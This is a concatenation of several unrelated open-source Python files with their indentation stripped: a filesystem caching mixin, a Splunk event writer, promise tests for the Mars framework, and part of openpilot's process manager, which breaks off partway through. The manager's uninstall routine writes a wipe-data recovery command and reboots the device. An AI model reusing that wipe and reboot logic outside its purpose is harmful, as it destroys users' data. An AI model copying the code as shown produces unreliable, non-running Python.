cpath = pathjoin(path,basename(nm))
ci = CachedInfo(info)
self.__set_cached_info(cpath,ci)
to_del = []
for nm in self.__cache.names(path):
if nm not in names:
to_del.append(nm)
for nm in to_del:
self.__cache.clear(pathjoin(path,nm))
#try:
# pci = self.__cache[path]
#except KeyError:
# pci = CachedInfo.new_dir_stub()
# self.__cache[path] = pci
#pci.has_full_children = True
return items
def ilistdirinfo(self,path="",*args,**kwds):
items = super(CacheFSMixin,self).ilistdirinfo(path,*args,**kwds)
for (nm,info) in items:
cpath = pathjoin(path,basename(nm))
ci = CachedInfo(info)
self.__set_cached_info(cpath,ci)
yield (nm,info)
def getsize(self,path):
return self.getinfo(path)["size"]
def setcontents(self, path, data=b'', encoding=None, errors=None, chunk_size=64*1024):
supsc = super(CacheFSMixin, self).setcontents
res = supsc(path, data, encoding=None, errors=None, chunk_size=chunk_size)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_file_stub()
return res
def createfile(self, path, wipe=False):
super(CacheFSMixin,self).createfile(path, wipe=wipe)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_file_stub()
def makedir(self,path,*args,**kwds):
super(CacheFSMixin,self).makedir(path,*args,**kwds)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_dir_stub()
def remove(self,path):
super(CacheFSMixin,self).remove(path)
with self.__cache_lock:
self.__cache.clear(path)
def removedir(self,path,**kwds):
super(CacheFSMixin,self).removedir(path,**kwds)
with self.__cache_lock:
self.__cache.clear(path)
def rename(self,src,dst):
super(CacheFSMixin,self).rename(src,dst)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def copy(self,src,dst,**kwds):
super(CacheFSMixin,self).copy(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
def copydir(self,src,dst,**kwds):
super(CacheFSMixin,self).copydir(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
def move(self,src,dst,**kwds):
super(CacheFSMixin,self).move(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def movedir(self,src,dst,**kwds):
super(CacheFSMixin,self).movedir(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def settimes(self,path,*args,**kwds):
super(CacheFSMixin,self).settimes(path,*args,**kwds)
with self.__cache_lock:
self.__cache.pop(path,None)
class CacheFS(CacheFSMixin,WrapFS):
"""Simple FS wrapper to cache meta-data of a remote filesystems.
This FS mixin implements a simplistic cache that can help speed up
access to a remote filesystem. File and directory meta-data is cached
but the actual file contents are not.
"""
pass
|
event_writer.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
from six import string_types
from builtins import object
import queue
import multiprocessing
import threading
import sys
from collections import Iterable
from splunktalib.common import log
class EventWriter(object):
def __init__(self, process_safe=False):
if process_safe:
self._mgr = multiprocessing.Manager()
self._event_queue = self._mgr.Queue(1000)
else:
self._event_queue = queue.Queue(1000)
self._event_writer = threading.Thread(target=self._do_write_events)
self._event_writer.daemon = True
self._started = False
self._exception = False
def start(self):
if self._started:
return
self._started = True
self._event_writer.start()
log.logger.info("Event writer started.")
def tear_down(self):
if not self._started:
return
self._started = False
self._event_queue.put(None)
self._event_writer.join()
log.logger.info("Event writer stopped.")
def isopen(self):
return self._started and (not self._exception)
def write_events(self, events):
if not self.isopen():
return False
if events is None:
return True
self._event_queue.put(events)
return True
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
if isinstance(event, string_types):
write(event.encode("utf-8"))
elif isinstance(event, Iterable):
for evt in event:
write(evt.encode("utf-8"))
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except queue.Empty:
# We need drain the queue before shutdown
# timeout means empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception(
"EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(event_queue.qsize())
)
self._exception = True
break
log.logger.info(
"Event writer stopped, queue leftsize={}".format(event_queue.qsize())
)
class EventWriterWithCheckpoint(EventWriter):
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
# event is a tuple which consists of events and checkpoint
# information: (events, checkpoint_tuple)
# checkpoint_tuple includes the checkpoint manager obj, key
# and value of checkpoint: (ckpt_mgr_obj, key, state)
events = event[0]
ckpt_tuple = event[1]
if isinstance(events, string_types):
write(events.encode("utf-8"))
elif isinstance(events, Iterable):
for evt in events:
write(evt.encode("utf-8"))
# Update checkpoint after events are sent to stdout to avoid
# data loss.
if ckpt_tuple and ckpt_tuple[2]:
ckpt_tuple[0].update_state(ckpt_tuple[1], ckpt_tuple[2])
# Close the checkpoint obj to flush the data in cache to
# disk to aviod data duplication if it is teared down
if not self._started:
ckpt_tuple[0].close()
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except queue.Empty:
# We need drain the queue before shutdown
# timeout means empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception(
"EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(event_queue.qsize())
)
self._exception = True
break
log.logger.info(
"Event writer stopped, queue leftsize={}".format(event_queue.qsize())
)
|
test_promise.py
|
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gc
import functools
import sys
import threading
import time
import unittest
import weakref
import sys
import gevent
from mars.actors import create_actor_pool
from mars.compat import Queue
from mars import promise
class ServeActor(promise.PromiseActor):
def __init__(self):
super(ServeActor, self).__init__()
self._result_list = []
def serve(self, value, delay=None, accept=True, callback=None):
gevent.sleep(delay or 0.1)
self._result_list.append(value)
if callback:
self.tell_promise(callback, value, _accept=accept)
def get_result(self):
return self._result_list
class PromiseTestActor(promise.PromiseActor):
def test_normal(self):
ref = self.promise_ref('ServeActor')
p = ref.serve(0, _promise=True)
for _ in range(10):
p = p.then(lambda v: ref.serve(v + 1, _promise=True))
def test_all_promise(self):
ref = self.promise_ref('ServeActor')
promises = []
def subsequent_all(*_):
def func(idx, *_, **kw):
return ref.serve(idx, _promise=True, **kw)
for idx in range(10):
promises.append(func(idx * 2).then(functools.partial(func, idx * 2 + 1)))
return promise.all_(promises)
ref.serve(-128, _promise=True) \
.then(subsequent_all) \
.then(lambda *_: ref.serve(127, _promise=True))
def test_timeout(self):
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _timeout=1, _promise=True) \
.catch(_rejecter)
def test_no_timeout(self):
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=1, _timeout=2, _promise=True) \
.catch(_rejecter)
def test_ref_reject(self):
from mars.errors import WorkerProcessStopped
try:
raise WorkerProcessStopped
except WorkerProcessStopped:
exc_info = sys.exc_info()
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter)
self.reject_promise_ref(ref, *exc_info)
def _raise_exception(exc):
raise exc
@unittest.skipIf(sys.platform == 'win32', 'does not run in windows')
class Test(unittest.TestCase):
def testPromise(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next(v, _accept=success)
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
def gen_promise(value, accept=True):
value_list.append(('gen_promise', value))
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: v + 1) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4),
('catch', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: gen_promise(v + 1, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 4), ('thread_body', 5),
('catch', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: _raise_exception(ValueError)) \
.catch(lambda *_: value_list.append(('catch',))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', )]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 3), ('thread_body', 4),
('gen_promise', 4), ('thread_body', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
finally:
gc.collect()
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testPromiseActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def test_proc():
test_ref.test_normal()
gevent.sleep(2)
self.assertListEqual(serve_ref.get_result(), list(range(11)))
gl = gevent.spawn(test_proc)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testAll(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next(v, _accept=success)
def gen_promise(value, accept=True):
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
value_list = []
promise.all_([]).then(lambda: value_list.append(('all', 0))).wait()
self.assertListEqual(value_list, [('all', 0)])
value_list = []
prior_promises = [gen_promise(idx) for idx in range(4)]
promise.all_(prior_promises).then(lambda: value_list.append(('all', 5))).wait()
del prior_promises
self.assertListEqual(
value_list,
[('thread_body', 1), ('thread_body', 2), ('thread_body', 3),
('thread_body', 4), ('all', 5)]
)
value_list = []
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
promise.all_(prior_promises).then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
del prior_promises
expected = [('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
def _gen_all_promise(*_):
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
return promise.all_(prior_promises)
value_list = []
gen_promise(0) \
.then(lambda *_: value_list.append(('pre_all', 0))) \
.then(_gen_all_promise) \
.then(lambda v: gen_promise(v)) \
.then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
expected = [('thread_body', 1), ('pre_all', 0), ('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
finally:
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testAllActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_all_promise()
gc.collect()
gevent.sleep(3)
self.assertListEqual(
serve_ref.get_result(),
[-128] + list(range(0, 20, 2)) + list(range(1, 20, 2)) + [127]
)
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testTimeoutActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_timeout()
gc.collect()
gevent.sleep(3)
self.assertListEqual(serve_ref.get_result(), [0, 'PromiseTimeout'])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testNoTimeoutActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_no_timeout()
gc.collect()
gevent.sleep(3)
# print(serve_ref.get_result())
self.assertListEqual(serve_ref.get_result(), [0])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testRefReject(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_ref_reject()
gc.collect()
gevent.sleep(3)
self.assertListEqual(serve_ref.get_result(), [0, 'WorkerProcessStopped'])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("Openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
from common.manager_helpers import print_cpu_usage
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
#"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
if os.getenv("GET_CPU_USAGE"):
proc_sock = messaging.sub_sock('procLog', conflate=True)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
start_t = time.time()
first_proc = None
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
if os.getenv("GET_CPU_USAGE"):
dt = time.time() - start_t
# Get first sample
if dt > 30 and first_proc is None:
first_proc = messaging.recv_sock(proc_sock)
# Get last sample and exit
if dt > 90:
last_proc = messaging.recv_sock(proc_sock, wait=True)
cleanup_all_processes(None, None)
sys.exit(print_cpu_usage(first_proc, last_proc))
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
